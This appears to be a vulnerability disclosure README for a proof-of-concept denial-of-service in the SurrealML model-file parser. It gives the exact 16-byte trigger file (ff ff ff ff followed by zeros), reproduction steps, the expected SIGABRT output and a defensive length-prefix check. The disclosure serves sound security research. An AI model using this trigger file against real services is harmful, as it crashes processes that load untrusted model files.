SurrealML Parser DoS — PoC Package

Finding: A 16-byte malformed .surml model file causes a deterministic process abort in the native SurrealML parser before ONNX runtime initialization.

Impact: DoS (process abort). No RCE, no ACE, no memory corruption claimed.

Affected: surrealml==0.0.4 / libc_wrapper.so v0.1.2 (released 2025-04-29)

Route: huntr MFV (Model Format Vulnerability)


Summary

The SurrealML native parser (libc_wrapper.so) reads the first 4 bytes of a .surml file as a little-endian u32 and uses this value directly as a Vec<u8> allocation length without any bounds check. Providing a value of 0xFFFFFFFF (4,294,967,295) causes the allocator to fail, triggering a Rust panic which — because the library is compiled with panic = abort — immediately kills the process with SIGABRT (exit code 134).

The crash occurs before ONNX runtime initialization. The ONNX runtime is not required to reproduce this issue.


Files

| File | Description |
|---|---|
| reproduce_direct_ctypes_crash.py | Primary reproduction script — direct ctypes path |
| mf_maxlen.surml | Trigger file (16 bytes, first u32 = 0xFFFFFFFF) |
| mf_issue20_control.surml | Control file — demonstrates prior-art distinction |
| requirements.txt | surrealml==0.0.4 |
| evidence_crash_matrix.json | 3-run crash evidence with threshold analysis |
| evidence_prior_art_distinction.json | Distinction from GitHub issue #20 |
| evidence_environment.json | Library version and ONNX bypass method |
| SHA256SUMS.txt | SHA256 hashes for all files |

Reproduction

pip install surrealml==0.0.4
python reproduce_direct_ctypes_crash.py

Expected output:

[INFO] surrealml version: 0.0.4
[INFO] libc_wrapper.so: <path>
[INFO] Trigger: mf_maxlen.surml (16 bytes)
[INFO] Trigger SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5
[INFO] SHA256 verified ✓
[CONTROL] Control file result: is_error=1 (safe — prior art path is fixed in v0.1.2)
[CRASH TEST] Running crash in subprocess...
[CRASH TEST] Child exit code: 134
[CRASH TEST] Child stderr: memory allocation of 4294967295 bytes failed
[RESULT] PASS — deterministic SIGABRT confirmed (exit 134, expected allocation failure message)

How the Crash Works

.surml file layout (first 4 bytes):
  [0:4]  u32 LE → header_length (used directly as Vec<u8> allocation size)
  [4:4+header_length] → header body

mf_maxlen.surml:
  ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
  └─────────┘
  header_length = 4,294,967,295 bytes

Result: Vec::with_capacity(4294967295) → allocator failure → panic (abort) → SIGABRT

The ONNX runtime is not involved. The crash occurs in load_model() before any ONNX-related code path.

ONNX bypass: link_onnx() returns an error struct (ONNX runtime extraction fails in some environments). This error is intentionally ignored in the reproduction script. The load_model() crash occurs independently.
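
A pre-load guard for callers that must accept untrusted .surml files while running the affected version, as an added example (not part of the PoC package or the SurrealML code base): it compares the 4-byte length prefix with the file's real size before the file reaches the native parser. The function names and the 16 MiB cap are assumptions; the trigger bytes are the ones listed on this page.

```python
import os
import struct
import tempfile

# Assumption: cap chosen for this example; size it to the largest header you expect.
MAX_HEADER_LEN = 16 * 1024 * 1024

# Trigger bytes as listed on this page (mf_maxlen.surml).
TRIGGER = bytes.fromhex("ffffffff" + "00" * 12)
# Constructed sample with a consistent prefix; not a real model file.
WELL_FORMED = struct.pack("<I", 5) + b"hello" + b"\x00" * 8


def check_length_prefix(prefix, file_size, max_header_len=MAX_HEADER_LEN):
    """Return (ok, header_length, reason) for a u32 LE length prefix."""
    if file_size < 4 or len(prefix) < 4:
        return (False, None, "shorter than the 4-byte length prefix")
    (header_length,) = struct.unpack("<I", prefix[:4])
    # The header body occupies [4:4+header_length], so it must fit in the file.
    if header_length > file_size - 4:
        return (False, header_length, "header_length exceeds bytes present in file")
    if header_length > max_header_len:
        return (False, header_length, "header_length exceeds configured cap")
    return (True, header_length, "ok")


def check_surml_file(path, max_header_len=MAX_HEADER_LEN):
    """Read only the size and first 4 bytes; never allocates header_length bytes."""
    file_size = os.path.getsize(path)
    with open(path, "rb") as fh:
        prefix = fh.read(4)
    return check_length_prefix(prefix, file_size, max_header_len)


def demo():
    """Write both samples to a temp dir and return the verdict for each."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in (("mf_maxlen.surml", TRIGGER),
                           ("constructed_ok.surml", WELL_FORMED)):
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(blob)
            results[name] = check_surml_file(path)
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

The guard only bounds the first length field and says nothing about the rest of the file, so running the load in a subprocess, as the reproduction script does for its crash test, remains a useful extra layer.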


Prior-Art Distinction

This finding is distinct from GitHub issue #20:

| | Issue #20 | This Finding |
|---|---|---|
| Filed | Jan 2024 | May 2026 |
| Trigger | 3717-byte file, first u32 = 757,932,081 | 16-byte file, first u32 = 4,294,967,295 |
| Crash type | OOB slice index | Vec allocation failure |
| Crash message | range end index ... out of range for slice | memory allocation of N bytes failed |
| Fixed in v0.1.2? | Yes — returns is_error=1 safely | No — SIGABRT |
| Fix location | Server-side only (surrealdb PR #3773) | Not fixed in libc_wrapper.so |

Control file verification: mf_issue20_control.surml (exact issue #20 trigger) returns is_error=1 gracefully in v0.1.2. This confirms the prior-art path is handled, while the allocation-exhaustion path is not.


Non-Claims

This PoC does not claim:

  • Remote code execution (RCE)
  • Arbitrary code execution (ACE)
  • Memory corruption / buffer overflow / heap spray
  • Privilege escalation
  • SurrealDB server compromise
  • High or Critical severity
  • CVSS score

The impact is limited to deterministic process abort (DoS) when loading an untrusted .surml file.


Trigger File

Name:   mf_maxlen.surml
Size:   16 bytes
Hex:    ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5